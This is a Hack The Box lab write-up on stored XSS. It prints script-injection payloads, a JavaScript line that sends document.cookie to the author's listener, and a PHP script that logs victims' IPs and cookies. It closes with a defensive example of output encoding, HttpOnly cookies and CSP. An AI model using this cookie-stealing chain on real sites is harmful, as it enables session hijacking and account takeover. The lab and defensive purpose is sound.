XSS (Cross-Site Scripting) [Skills Assessment] Hack The Box Writeup

Jun Takemura · January 2, 2025

Skills Assessment

Task

Access the /assessment directory on the server using the browser.

  1. Identify a user-input field that is vulnerable to an XSS vulnerability
  2. Find a working XSS payload that executes JavaScript code on the target’s browser
  3. Using the Session Hijacking techniques, try to steal the victim’s cookies, which should contain the flag

What is the value of the ‘flag’ cookie?

Attempt

By inspecting the website, I found the search form under /assessment and the Comment, Name, Email, and Website forms under /assessment/index.php/2021/06/11/welcome-to-security-blog/. I made an educated guess that there’s an XSS vulnerability here. (Actually the blog author name was xss lol)

So first I started running a PHP server:

php -S 0.0.0.0:9000

Here 0.0.0.0 means ‘listen on all network interfaces.’ The server is then reachable on every interface of the machine: loopback, the LAN address, and any externally routed address, so the target can fetch scripts from it.

Then I tried the payloads below in the corresponding fields:

<script src="http://MyLocalIp:9000/comment"></script>
<script src="http://MyLocalIp:9000/name"></script>
<script src="http://MyLocalIp:9000/website"></script>

Also I entered [email protected] in the email field.

But this gave me an error, ‘Please fill the required fields (name, email).’ I added "> to the name field and my PHP server got 10.129.50.92:35962 [404]: GET /website - No such file or directory. (It seemed like the name field discarded the <script> tag.)

Then I made (actually reused the one I made for the module) this .js file:

// Requests a fake image whose URL carries the victim's cookies as the "c" parameter.
new Image().src='http://MyLocalIp:9000/sess_hijack.php?c='+document.cookie;

and this .php file:

<?php
// Receives the cookie string sent by the injected script in the "c" parameter,
// splits it on ";" (one entry per cookie) and appends each to cookies.txt
// together with the requesting client's IP address.
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

I put them under /tmp/tmpserver, where I was running the PHP server.

And I injected this XSS payload in the Website field:

<script src="http://MyLocalIp:9000/steal-cookie.js"></script>

I got a cookie with the flag.
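The flag was stealable for two reasons: the Website field was written into the page without output encoding, and the cookie was readable from document.cookie. The following is an added defensive example, not code from this writeup or from the Hack The Box lab; it shows how the comment form's server side would render those fields so the payload above becomes inert text, and how the cookie would be issued so that injected JavaScript cannot read it. The field names (name, email, website, comment), the cookie name ‘flag’ and the helper names are assumptions.

```php
<?php
// Added defensive example (not the writeup's or the lab's code). Field names,
// the cookie name and all helper names are assumptions.
declare(strict_types=1);

// Escape an untrusted string before placing it in an HTML text node or
// attribute value. ENT_QUOTES also encodes ' and " so the value cannot break
// out of a quoted attribute; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
// returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// The Website field ends up inside an href, so escaping alone is not enough:
// require an absolute http(s) URL and drop the link otherwise (this also
// rejects javascript: URLs and the <script src=...> payload from the writeup).
function safe_website(string $url): ?string
{
    $url = trim($url);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// Build the HTML for one comment from the submitted fields. Every value that
// came from the user passes through h(); the URL is validated first.
function render_comment(array $fields): string
{
    $name = h($fields['name'] ?? '');
    $body = h($fields['comment'] ?? '');
    $site = safe_website($fields['website'] ?? '');

    $author = $site === null
        ? "<span class=\"author\">{$name}</span>"
        : "<a class=\"author\" href=\"" . h($site) . "\" rel=\"nofollow noopener\">{$name}</a>";

    return "<div class=\"comment\">{$author}<p>{$body}</p></div>";
}

// Issue the cookie with HttpOnly so document.cookie cannot read it, Secure so
// it is only sent over HTTPS, and SameSite to limit cross-site sending. Even
// if an XSS payload does run, the exfiltration used in the writeup gets an
// empty document.cookie.
function issue_flag_cookie(string $value): void
{
    setcookie('flag', $value, [
        'expires'  => time() + 3600,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}

// Constructed sample submission mirroring the payloads tried in the writeup.
$submitted = [
    'name'    => 'xss"><script src="http://MyLocalIp:9000/name"></script>',
    'email'   => 'xss@example.test',
    'website' => '<script src="http://MyLocalIp:9000/steal-cookie.js"></script>',
    'comment' => 'hello',
];

echo render_comment($submitted), PHP_EOL;
```

Run with php on the command line: the printed markup contains the payloads as &lt;script ...&gt; text rather than as elements, and no link is emitted because the Website value is not a valid http(s) URL. The name-field behaviour observed above (the <script> tag being dropped) is a filter, not an encoding; filters can be bypassed, whereas encoding every untrusted value at output time and marking session cookies HttpOnly close both halves of this attack. A Content-Security-Policy that restricts script-src to the site's own origin would additionally stop the browser from loading a script from an attacker-controlled host even if an injection slipped through.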
